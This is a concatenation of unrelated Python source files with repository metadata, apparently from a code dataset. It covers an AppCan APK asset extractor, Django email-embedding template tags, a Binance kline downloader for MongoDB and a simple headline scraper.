    def doSigCheck(self):
        """Return True when the APK's main activity matches the expected signature."""
        # NOTE(review): this matches the Cordova main-activity class, not an
        # AppCan-specific one — looks copy-pasted from the Cordova module;
        # confirm the intended signature string.
        if self.os == "android":
            return self._find_main_activity("org.apache.cordova.CordovaActivity")
        elif self.os == "ios":
            log.error("not support yet.")
            return False
        return False

    def extractFromHybridApp(self, working_folder):
        """Copy everything under assets/widget/ out of the APK into
        <cwd>/working_folder/<apk hash> and return that directory."""
        extract_folder = os.path.join(os.getcwd(), working_folder, self.hash)
        # start from a clean output directory on every run
        if os.access(extract_folder, os.R_OK):
            shutil.rmtree(extract_folder)
        os.makedirs(extract_folder, exist_ok = True)
        # extract the assets/data/dcloud_control.xml to get appid
        zf = zipfile.ZipFile(self.detect_file, 'r')
        code_dir = "assets/widget/"
        for f in zf.namelist():
            if f.startswith(code_dir):
                # print(f)
                # create dir anyway
                td = os.path.dirname(os.path.join(extract_folder, f[len(code_dir): ]))
                if not os.access(td, os.R_OK):
                    os.makedirs(td)
                with open(os.path.join(extract_folder, f[len(code_dir): ]), "wb") as fwh:
                    fwh.write(zf.read(f))
        return extract_folder

    def decrypt(self, targetDir, key):
        # NOTE(review): decryption of the extracted assets is not implemented
        # yet; currently this only prints the recovered key.
        print(key)

    def doExtract(self, targetapk):
        """Use the bundled decodeAppcan.jar (via JPype) to find the APK's start
        page; for hybrid builds, extract the packaged web assets and attempt
        decryption. Returns (extract_folder, launch_path)."""
        # load the jar files built for decoding AppCan packages
        jarpath = os.path.join("../../bin/decodeAppcan_jar/decodeAppcan.jar")
        jarpath2 = os.path.join("../../bin/decodeAppcan_jar/kxml2-2.3.0.jar")
        jarpath3 = os.path.join("../../bin/decodeAppcan_jar/xmlpull-1.1.3.1.jar")
        jarpath4 = os.path.join("../../bin/decodeAppcan_jar/apktool_2.5.0.jar")
        # locate the JVM shared library (jvm.dll / libjvm.so)
        jvmpath = jpype.getDefaultJVMPath()
        # start the JVM with all four jars on the classpath
        jpype.startJVM(jvmpath, "-ea", "-Djava.class.path={}:{}:{}:{}".format(jarpath,jarpath2,jarpath3,jarpath4))
        # load the Java class (argument is the fully qualified class name)
        javaclass = jpype.JClass("Main")
        # instantiate java object
        # javaInstance = javaClass()
        # the Java methods are static, so they can be called on the class itself
        path = os.path.abspath(os.path.join(os.getcwd(), targetapk))
        print(path)
        launch_path = javaclass.getIndexurl(path)
        # os.system could run the jar as well, but only yields an exit status,
        # not the computed launch path:
        #launch_path = os.system("java -classpath /home/user/IdeaProjects/decodeAppcan/out/artifacts/decodeAppcan_jar/decodeAppcan.jar:/home/user/IdeaProjects/decodeAppcan/out/artifacts/decodeAppcan_jar/kxml2-2.3.0.jar:/home/user/IdeaProjects/decodeAppcan/out/artifacts/decodeAppcan_jar/xmlpull-1.1.3.1.jar Main /home/user/Downloads/appcan2.apk")
        print(launch_path)
        extract_folder = "null"
        # str(...) converts the returned java.lang.String to a Python str.
        # If the start page is under "file:///android_asset/widget/", the app is
        # a hybrid build: extract the packaged assets and, if encrypted,
        # decrypt them with the key recovered from the APK.
        if (str(launch_path)).startswith("file:///android_asset/widget/"):
            extract_folder = self.extractFromHybridApp("working_folder")
            cipherkey = javaclass.getCipherkey()
            self.decrypt(extract_folder, cipherkey)
        return extract_folder, launch_path
def main():
    """Smoke test: run the AppCan detector/extractor against a sample APK."""
    f = "../../../test_case/appcan_unencrypted.apk"
    appcan = Appcan(f, "android")
    if appcan.doSigCheck():
        logging.info("cordova signature Match")
        extract_folder, launch_path = appcan.doExtract(f)
        log.info("{} is extracted to {}, the start page is {}".format(f, extract_folder, launch_path))
    return


if __name__ == "__main__":
    sys.exit(main())
| [
"984363019@qq.com"
] | 984363019@qq.com |
168e3184e9863ffa8a6ffc231b8407814c8f76a0 | 3b04961750316c08e97fcd034f0a543cc8335582 | /templatetags/emailmultirelated.py | 4401810d50c88ec5ec2ac7d656250fbb0b1d586f | [] | no_license | nex2hex/django-email-multi-related | d4a6248a4154e31e1639051ad8bd777534aa465d | f18e383a9606bb89a5f2970c46ee7d006846bc81 | refs/heads/master | 2020-05-20T13:02:10.085891 | 2015-05-20T10:37:08 | 2015-05-20T10:37:08 | 10,380,721 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,325 | py | # # -*- coding: utf-8 -*-
from django.template import Library
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.files.storage import default_storage
from ..mail import EmailMultiRelated
register = Library()
@register.simple_tag(takes_context=True)
def email_embedded_static(context, path):
    """Attach a static file as an inline (related) email attachment.

    When rendering inside an EmailMultiRelated message, attaches the static
    file at *path* and returns a ``cid:`` reference for the ``src`` attribute;
    otherwise falls back to the plain static URL.

    Example: <img src="{% email_embedded_static "django/email/header.png" %}" width="780" height="11" alt=""/>
    """
    message = context.get('emailmultirelated_object')
    if not isinstance(message, EmailMultiRelated):
        return staticfiles_storage.url(path)
    content_id = message.attach_related_file(staticfiles_storage.path(path))
    return 'cid:' + content_id
@register.simple_tag(takes_context=True)
def email_embedded_media(context, path):
    """Attach a media file as an inline (related) email attachment.

    When rendering inside an EmailMultiRelated message, attaches the media
    file at *path* and returns a ``cid:`` reference for the ``src`` attribute;
    otherwise falls back to the plain media URL.

    Example: <img src="{% email_embedded_media "django/email/header.png" %}" width="780" height="11" alt=""/>
    """
    message = context.get('emailmultirelated_object')
    if not isinstance(message, EmailMultiRelated):
        return default_storage.url(path)
    content_id = message.attach_related_file(default_storage.path(path))
    return 'cid:' + content_id
"nex2hex@ya.ru"
] | nex2hex@ya.ru |
8c912c64395761ca3421a95005ad3a8f5f2f996e | b3eacb150e22b28f405f1d0d1e09c8cf2c91cebb | /QUANTAXIS/QASU/save_binance.py | 22338470decbb0ca4d6666da31f7ed2cb7d4c12c | [
"MIT"
] | permissive | wangyuefengGH/QUANTAXIS | 77a2c4e1ce91388c0a5925d0ee159eebc13f11ed | 2e198b621680c5f3a609f9c202bd4ae583621d31 | refs/heads/master | 2020-03-19T06:21:59.738112 | 2018-06-29T05:51:17 | 2018-06-29T05:51:17 | 136,013,065 | 0 | 0 | MIT | 2018-06-29T05:51:18 | 2018-06-04T11:07:22 | Python | UTF-8 | Python | false | false | 3,077 | py | import datetime
import time
from dateutil.tz import tzutc
from dateutil.relativedelta import relativedelta
from QUANTAXIS.QAUtil import (DATABASE, QASETTING,
QA_util_get_real_date, QA_util_log_info,
QA_util_to_json_from_pandas, trade_date_sse)
from QUANTAXIS.QAFetch.QAbinance import QA_fetch_symbol, QA_fetch_kline
import pymongo
# Binance kline history only exists from July 2017; earlier data was
# apparently not preserved by the exchange. author:Will
BINANCE_MIN_DATE = datetime.datetime(2017, 7, 1, tzinfo=tzutc())
# Offset of one bar back from "now" per frequency code, used to avoid
# requesting the still-open candle. (The 'FREQUANCY' misspelling is kept
# because other modules may import this name.)
FREQUANCY_DICT = {
    "1m": relativedelta(minutes=-1),
    "1d": relativedelta(days=-1),
    "1h": relativedelta(hours=-1)
}
def QA_SU_save_binance(frequency):
    """Incrementally download Binance klines of *frequency* into MongoDB.

    Each symbol resumes from the close_time of its last stored candle;
    symbols never seen before start at BINANCE_MIN_DATE.
    """
    symbol_list = QA_fetch_symbol()
    col = QASETTING.client.binance[frequency]
    # unique (symbol, start_time) index prevents duplicate candles on re-runs
    col.create_index(
        [("symbol", pymongo.ASCENDING), ("start_time", pymongo.ASCENDING)], unique=True)

    end = datetime.datetime.now(tzutc())
    # step back one bar so the still-forming candle is not stored
    # NOTE(review): an unknown frequency makes FREQUANCY_DICT.get() return None
    # and this addition raise TypeError — confirm callers only pass 1m/1h/1d.
    end += FREQUANCY_DICT.get(frequency)

    for index, symbol_info in enumerate(symbol_list):
        QA_util_log_info('The {} of Total {}'.format
                         (symbol_info['symbol'], len(symbol_list)))
        QA_util_log_info('DOWNLOAD PROGRESS {} '.format(str(
            float(index / len(symbol_list) * 100))[0:4] + '%')
        )
        ref = col.find({"symbol": symbol_info['symbol']}).sort("start_time", -1)
        if ref.count() > 0:
            # resume from the last stored candle's close time (ms -> s)
            start_stamp = ref.next()['close_time'] / 1000
            start_time = datetime.datetime.fromtimestamp(start_stamp, tz=tzutc())
            QA_util_log_info('UPDATE_SYMBOL {} Trying updating {} from {} to {}'.format(
                frequency, symbol_info['symbol'], start_time, end))
        else:
            start_time = BINANCE_MIN_DATE
            QA_util_log_info('NEW_SYMBOL {} Trying downloading {} from {} to {}'.format(
                frequency, symbol_info['symbol'], start_time, end))

        data = QA_fetch_kline(symbol_info['symbol'],
                              time.mktime(start_time.utctimetuple()), time.mktime(end.utctimetuple()), frequency)
        if data is None:
            QA_util_log_info('SYMBOL {} from {} to {} has no data'.format(
                symbol_info['symbol'], start_time, end))
            continue
        col.insert_many(data)
def QA_SU_save_binance_1min():
    """Convenience wrapper: save/refresh Binance 1-minute klines."""
    QA_SU_save_binance("1m")
def QA_SU_save_binance_1day():
    """Convenience wrapper: save/refresh Binance daily klines."""
    QA_SU_save_binance('1d')
def QA_SU_save_binance_1hour():
    """Convenience wrapper: save/refresh Binance hourly klines."""
    QA_SU_save_binance('1h')
def QA_SU_save_symbols():
    """Refresh the cached Binance symbol list in MongoDB.

    Skips the download when the ``binance.symbols`` collection already
    holds the same number of symbols as the exchange reports; otherwise
    drops the collection and fully re-creates it from a fresh fetch.
    NOTE(review): the count comparison cannot detect symbols that were
    replaced 1-for-1 — confirm this heuristic is acceptable upstream.
    """
    symbols = QA_fetch_symbol()
    col = QASETTING.client.binance.symbols
    # count_documents({}) replaces col.find().count(), which was
    # deprecated in PyMongo 3.7 and removed in 4.0.
    if col.count_documents({}) == len(symbols):
        QA_util_log_info("SYMBOLS are already existed and no more to update")
    else:
        QA_util_log_info("Delete the original symbols collections")
        QASETTING.client.binance.drop_collection("symbols")
        QA_util_log_info("Downloading the new symbols")
        col.insert_many(symbols)
        QA_util_log_info("Symbols download is done! Thank you man!")
# Script entry point: refresh the cached symbol list when run directly.
if __name__ == '__main__':
    QA_SU_save_symbols()
| [
"157747074@qq.com"
] | 157747074@qq.com |
e53da388678d4b9733ee70de1f6fef2423380558 | 132e4093d7ef1214413264e9da92f912805a0ccb | /frontend/__init__.py | bb757ac35be7911b2252e4f7e9eea1d53009a723 | [] | no_license | AzoeDesarrollos/NewPyGPJ | 27b11cfd4c4783d647a0105c4587e873b7047e27 | 0d5d525ef82a8bc342ffe36df536d3c52e5d49b9 | refs/heads/master | 2023-02-08T13:37:46.543738 | 2020-12-22T14:46:39 | 2020-12-22T14:46:39 | 107,919,586 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from .window import Window
Window() | [
"32693604Zd"
] | 32693604Zd |
3befaab53c7e724ea46e583b75b6b22aec4a5286 | 2da03bbead1fb74c22a5f5ce32692a7d8c31a923 | /scrappingHTML.py | 6df5f15bafce0a1afd8ed1a531175a0b09d5faf5 | [] | no_license | tkepassport39/webScrapingHTMLpy | 6742d98e40c5d210542385b9847e9d55c9461565 | 6736671a60cdbbc7a437c1d0cebc01f1bcf8e3e0 | refs/heads/master | 2020-09-12T06:02:59.108155 | 2019-11-18T00:59:48 | 2019-11-18T00:59:48 | 222,335,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | """
This codes purpose is to give me the latest story
listing from a specific website. Website not mentioned for reasons.
"""
import requests
from bs4 import BeautifulSoup
# get input from user
url = input("Enter the URL: ")
finalUrl = ""
# check if user input www
if "www." in url:
# replace www with http://
finalUrl = url.replace("www.", "http://")
else:
finalUrl = "https://" + url
print("url : " + finalUrl)
# get web page html content
r = requests.get(finalUrl)
# grab all the text and parse to html
soup = BeautifulSoup(r.text, 'html.parser')
formatted_link = []
for link in soup.find_all('h2', class_='post-block__title'):
# get the name of the a attribute with whitespaces stripped
name = [text for text in link.stripped_strings]
print("TITLE : " + name[0])
print("URL : " + link.a['href'])
"""
data = {
'title': name[0],
'URL': link.a['href']
}
print(data)
#formatted_link.append(data)
"""
#print(formatted_link) | [
"avanegas04@gmail.com"
] | avanegas04@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.